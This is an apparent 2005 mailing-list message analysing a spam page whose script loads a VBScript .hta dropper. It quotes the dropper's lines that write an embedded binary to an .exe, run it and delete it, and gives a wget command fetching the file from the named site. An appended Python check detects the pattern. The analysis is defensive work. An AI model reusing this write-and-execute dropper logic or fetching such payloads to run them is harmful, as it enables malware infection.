--On Thursday, September 01, 2005 11:50 AM -0700 Kenneth Porter <[EMAIL PROTECTED]> wrote:

Interesting. The link in that spam leads to a page containing just a news
article with the same text, and a "next article" link. But inspection of
the page source reveals this bit of JavaScript. Any idea what it does? (I
threw some spaces inside the script tags so hopefully OE users on the
list won't see this run.) Mozilla's JavaScript console complains about
some errors.

OK, a bit more investigation shows that it tries to load /w.hta from the same site. This is a VBScript program that attempts to write a "text" file of some binary and then execute it via the MS media player APIs. Smells like an attempt to infect the target with some virus.

This command can be used to fetch the file for inspection:

wget -nd -c http://nextermest.com/w.hta

The critical bits of code:

Fi="C:\fh4uh.exe"
set NNM=MSmedia.CreateTextFile(Fi, TRUE)
NNM.Write(R)
NNM.Close()
MSplay.Run (Fi),1,TRUE
MSmedia.DeleteFile(Fi)
self.Close

R contains a binary string; its initialization takes up most of the file.
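
Added example (not part of the original message): a static check that flags the write-then-run sequence shown in the excerpt above, without executing the script. The function name, the extension list and the benign sample are assumptions made for illustration; the first sample is built from the quoted lines with R's payload omitted.

```python
import re

# Sample built from the excerpt quoted in the message above; R's payload is omitted.
SAMPLE_HTA = r'''
Fi="C:\fh4uh.exe"
set NNM=MSmedia.CreateTextFile(Fi, TRUE)
NNM.Write(R)
NNM.Close()
MSplay.Run (Fi),1,TRUE
MSmedia.DeleteFile(Fi)
self.Close
'''

# Constructed benign script: writes a text file and never runs it.
BENIGN = r'''
logPath="C:\temp\notes.txt"
set f=fso.CreateTextFile(logPath, TRUE)
f.Write("hello")
f.Close()
'''

# A variable assigned a quoted path ending in an executable extension (assumed list).
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]+\.(?:exe|com|scr|pif|bat))"\s*$',
                    re.I | re.M)

def find_droppers(script):
    """Report each variable holding an executable path that is created with
    CreateTextFile and later passed to a .Run call. Text matching only; the
    object names (MSmedia, MSplay, ...) are ignored because they are arbitrary."""
    findings = []
    for m in ASSIGN.finditer(script):
        var, path = m.group(1), m.group(2)
        v = re.escape(var)
        created = re.search(r'\.CreateTextFile\s*\(\s*' + v + r'\b', script, re.I)
        ran = re.search(r'\.Run\s*\(?\s*' + v + r'\b', script, re.I)
        deleted = re.search(r'\.DeleteFile\s*\(?\s*' + v + r'\b', script, re.I)
        if created and ran and created.start() < ran.start():
            # self_cleanup: the file is deleted after it has been run
            cleanup = bool(deleted and deleted.start() > ran.start())
            findings.append({"variable": var, "path": path, "self_cleanup": cleanup})
    return findings

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_HTA), ("benign", BENIGN)):
        print(name, find_droppers(text))
```

The check reads the fetched file as text only, so it can be run on a copy of w.hta on a non-Windows analysis host.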
